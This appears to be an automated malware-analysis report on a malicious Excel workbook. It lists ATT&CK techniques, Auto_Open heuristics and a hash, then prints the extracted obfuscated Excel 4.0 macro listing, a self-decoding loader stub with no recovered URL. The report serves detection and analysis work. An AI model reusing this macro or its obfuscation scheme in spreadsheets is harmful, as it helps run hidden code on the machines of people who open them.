Verdict: MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
This Excel file contains Excel 4.0 (XLM) macros, specifically an Auto_Open function, which is a known method for executing malicious code. The critical heuristics indicate the presence of dangerous formula APIs within the Auto_Open macro, suggesting it's designed to download and execute a secondary payload. No specific URLs or hashes were extracted, hence the family is unknown.
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6619 bytes |

SHA-256: 60d52727ac4e1ba41bea898f211bd823bfc1af5563d68f38b930a63b9b83b97a

Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - UrWkTQRSXB
' 0018 26 LABEL : Cell Value, String Constant - aLLoGeUjEUp len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!H176
' 0018 23 LABEL : Cell Value, String Constant - BBAICwLd len=0
' 0018 23 LABEL : Cell Value, String Constant - DuozzvaB len=0
' 0018 21 LABEL : Cell Value, String Constant - dUuLka len=0
' 0018 25 LABEL : Cell Value, String Constant - EQmAvpcYOc len=0
' 0018 22 LABEL : Cell Value, String Constant - FtPRFtj len=0
' 0018 27 LABEL : Cell Value, String Constant - FWjOkznmfMlO len=0
' 0018 25 LABEL : Cell Value, String Constant - ixIYMZLewJ len=0
' 0018 26 LABEL : Cell Value, String Constant - lhvcftroNwE len=0
' 0018 24 LABEL : Cell Value, String Constant - LMllnSCYv len=0
' 0018 20 LABEL : Cell Value, String Constant - mPmZk len=0
' 0018 27 LABEL : Cell Value, String Constant - ohlSBpJaJGUV len=0
' 0018 24 LABEL : Cell Value, String Constant - ohqSSqwgD len=0
' 0018 20 LABEL : Cell Value, String Constant - pkFBP len=0
' 0018 27 LABEL : Cell Value, String Constant - TjoPCKmOdqkW len=0
' 0018 27 LABEL : Cell Value, String Constant - wWVgjKnUVmfc len=0
' 0018 21 LABEL : Cell Value, String Constant - xzGJCQ len=0
' 0018 25 LABEL : Cell Value, String Constant - YDdJnshrIj len=0
' 0018 22 LABEL : Cell Value, String Constant - ysxXCur len=0
' 0018 20 LABEL : Cell Value, String Constant - zBjmW len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' UrWkTQRSXB,H72,"SET.NAME("pkFBP",VALUE("0"))",""
' UrWkTQRSXB,H74,"SET.NAME("wWVgjKnUVmfc",pkFBP)",""
' UrWkTQRSXB,H78,"SET.NAME("DuozzvaB",pkFBP)",""
' UrWkTQRSXB,H82,"SET.NAME("YDdJnshrIj",COUNTA(EQmAvpcYOc))",""
' UrWkTQRSXB,H85,"SET.NAME("LMllnSCYv",COUNTA(mPmZk))",""
' UrWkTQRSXB,H90,[],""
' UrWkTQRSXB,H94,"SET.NAME("ixIYMZLewJ","")",""
' UrWkTQRSXB,H96,"wWVgjKnUVmfc",""
' UrWkTQRSXB,H101,"SET.NAME("FtPRFtj",HLOOKUP("*",EQmAvpcYOc,wWVgjKnUVmfc,FALSE))",""
' UrWkTQRSXB,H103,"BBAICwLd",""
' UrWkTQRSXB,H108,"SET.NAME("ysxXCur",pkFBP)",""
' UrWkTQRSXB,H113,[],""
' UrWkTQRSXB,H118,"ysxXCur",""
' UrWkTQRSXB,H121,"TjoPCKmOdqkW",""
' UrWkTQRSXB,H126,"ohlSBpJaJGUV",""
' UrWkTQRSXB,H129,"aLLoGeUjEUp",""
' UrWkTQRSXB,H132,"SET.NAME("lhvcftroNwE",VALUE(HLOOKUP("*",mPmZk,aLLoGeUjEUp,FALSE)))",""
' UrWkTQRSXB,H137,"zBjmW",""
' UrWkTQRSXB,H142,"ixIYMZLewJ",""
' UrWkTQRSXB,H147,"DuozzvaB",""
' UrWkTQRSXB,H152,NEXT(),""
' UrWkTQRSXB,H154,"dUuLka",""
' UrWkTQRSXB,H158,"SET.NAME("f",INT(T(FORMULA(T(ixIYMZLewJ)&"",""&T(dUuLka)))))",""
' UrWkTQRSXB,H162,"ohqSSqwgD",""
' UrWkTQRSXB,H167,NEXT(),""
' UrWkTQRSXB,H171,RETURN(),""
' UrWkTQRSXB,H201,"SET.NAME("FWjOkznmfMlO",H72)",""
' UrWkTQRSXB,H204,"EQmAvpcYOc",""
' UrWkTQRSXB,H209,"SET.NAME("mPmZk",R77C13)",""
' UrWkTQRSXB,H212,"SET.NAME("ohqSSqwgD",221)",""
' UrWkTQRSXB,H215,"SET.NAME("xzGJCQ",8)",""
' UrWkTQRSXB,H220,FWjOkznmfMlO(),""
' UrWkTQRSXB,H221,HALT(),""